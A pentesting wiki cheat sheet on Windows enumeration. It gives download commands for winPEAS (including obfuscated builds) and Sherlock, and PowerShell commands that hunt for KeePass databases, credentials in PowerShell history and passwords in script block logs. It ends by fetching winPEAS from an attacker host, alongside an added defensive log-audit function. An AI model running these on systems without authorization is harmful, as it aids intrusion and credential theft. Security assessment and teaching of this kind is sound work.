# Windows Enumeration

Published 2025-11-24

This part of the wiki covers the manual and automated recon process you might use during your pentesting assessments.

# Recon - Auto

# Sherlock

GitHub link: https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O sherlock.ps1

# Winpeas

GitHub link: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Default Version

wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx64.exe -O winpeas64.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx86.exe -O winpeas86.exe

Obfuscated Version

wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx64_ofs.exe -O winpeas64op.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221113/winPEASx86_ofs.exe -O winpeas86op.exe

# Recon - Manual

You don't need a tool for this part, just access to a PowerShell command line.

# Local Enumeration Commands

Make sure to use a PowerShell interpreter.

whoami /priv
whoami /groups

Check local users and groups

Get-LocalUser
Get-LocalGroup

Check users inside a local group

Get-LocalGroupMember <group-name>

Check system information

systeminfo
ipconfig /all
route print
netstat -ano

# Installed applications

For more detail on each entry (version, publisher, install location), remove the select part.

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# Processes

Get-Process
Get-Process | Select-Object Name, Id, Path

# File search

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Focused on XAMPP; change the path to look at other application folders.

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Focused on a user's profile folder

Get-ChildItem -Path C:\Users\<NAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.settings -File -Recurse -ErrorAction SilentlyContinue

# Looking for Secrets in PowerShell

Get-History
(Get-PSReadlineOption).HistorySavePath

Script blocks recorded in the Event Viewer (event ID 4104, script block logging) can contain hard-coded passwords

Get-WinEvent -FilterHashtable @{logname = "Microsoft-Windows-PowerShell/Operational"; id = 4104 } | Select-Object -ExpandProperty Message
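As an added example (not from the original page), the function below turns the 4104 query above into an audit that flags script block fragments containing credential-looking strings, so the secret can be removed from the script and rotated. It assumes script block logging is enabled on the host; the regex patterns are a constructed starting set, not an exhaustive list.

```powershell
# Added example, not part of the original page.
# Audits PowerShell script block logs (event ID 4104) for hard-coded credentials.
# Assumes the Microsoft-Windows-PowerShell/Operational log exists and is enabled.
function Find-ScriptBlockSecrets {
    param(
        [int]$MaxEvents = 500,
        # Constructed patterns for illustration; tune them to your environment.
        [string[]]$Patterns = @(
            '(?i)ConvertTo-SecureString\s+.*-AsPlainText',
            '(?i)\b(password|passwd|pwd)\s*[=:]\s*\S+',
            '(?i)net\s+use\s+.*\s/user:\S+\s+\S+'
        )
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            $event = $_
            # For a 4104 event, Properties[2] is the ScriptBlockText fragment and
            # Properties[3] the ScriptBlockId. Long scripts are split into several
            # fragments, so a pattern spanning a fragment boundary will be missed.
            $text = $event.Properties[2].Value
            if (-not $text) { return }
            foreach ($p in $Patterns) {
                foreach ($m in [regex]::Matches($text, $p)) {
                    [pscustomobject]@{
                        TimeCreated   = $event.TimeCreated
                        RecordId      = $event.RecordId
                        ScriptBlockId = $event.Properties[3].Value
                        Pattern       = $p
                        Match         = $m.Value
                    }
                }
            }
        }
}

# Review the findings, then fix the offending script and rotate the exposed secret.
Find-ScriptBlockSecrets -MaxEvents 2000 | Format-Table -AutoSize -Wrap
```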

# Run As

This runs the command as another user; you are prompted for that user's password.

runas /user:<NAME> cmd

# Download remote file

iwr -uri http://192.168.1.35/winPEASx64.exe -Outfile winPEAS.exe